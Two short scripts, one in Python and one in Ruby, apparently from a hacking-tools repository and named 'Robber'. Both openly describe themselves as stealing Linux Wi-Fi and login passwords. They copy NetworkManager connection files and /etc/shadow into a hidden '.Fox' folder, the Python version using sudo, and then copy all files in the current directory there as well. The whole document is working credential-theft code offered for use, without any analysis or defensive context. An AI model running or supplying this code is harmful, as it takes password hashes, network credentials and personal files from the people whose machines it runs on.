File: Linux/Robber.py
import os
from os import walk
import shutil
from distutils.dir_util import copy_tree

### Steal WIFI Password On Linux ###
files = os.listdir("/etc/NetworkManager/system-connections/")
os.mkdir(".Fox")
os.mkdir(".Fox/WIFI_PASS")
num = 1
for line in files:
    shutil.copy2("/etc/NetworkManager/system-connections/" + line,
                 ".Fox/WIFI_PASS/WIFI-" + str(num) + ".txt")
    num += 1

### Steal Linux Password ###
os.mkdir(".Fox/OS_PASS")
os.system("sudo cat /etc/shadow > .Fox/OS_PASS/OS_Pass.txt")

### Take Backup ###
os.mkdir(".Fox/BackUP")
data_dir = []
for (dirpath, dirnames, filenames) in walk("."):
    data_dir.extend(dirnames)
    break
for dir in data_dir:
    if dir == ".Fox":
        pass
    else:
        copy_tree(dir, ".Fox/BackUP")
data_file = []
for (dirpath, dirnames, filenames) in walk("."):

    data_file.extend(filenames)
    break
for file in data_file:
    if file == os.path.basename(__file__):
        pass
    else:
        shutil.copy2(file, ".Fox/BackUP")

File: Linux/Robber.rb
require 'fileutils'

### Steal WIFI Password On Linux ###
files = Dir.entries('/etc/NetworkManager/system-connections/').select do |f|
  File.file? File.join('/etc/NetworkManager/system-connections/', f)
end
Dir.mkdir('.Fox')
num = 1
files.each do |line|
  data_read = File.read("/etc/NetworkManager/system-connections/#{line}")
  File.open(".Fox/WIFI-#{num}.txt", 'w') do |word|
    word.puts data_read
  end
  num += 1
end

### Steal Linux Password ###
os_pass = File.read('/etc/shadow')
File.open('.Fox/OS_Pass.txt', 'w') do |line|
  line.puts os_pass
end

### Take Backup ###
Dir.mkdir('.Fox/BackUP')
data_dir = Dir.entries('.').select { |f| File.directory? File.join('.', f) }
data_dir.each do |dir|
  case dir
  when '.', '..', '.Fox'
    next
  else
    FileUtils.copy_entry dir, '.Fox/BackUP'
  end
end
data_file = Dir.entries('.').select { |f| File.file? File.join('.', f) }
data_file.each do |file|
  next if file == __FILE__

  FileUtils.cp file, '.Fox/BackUP'
end
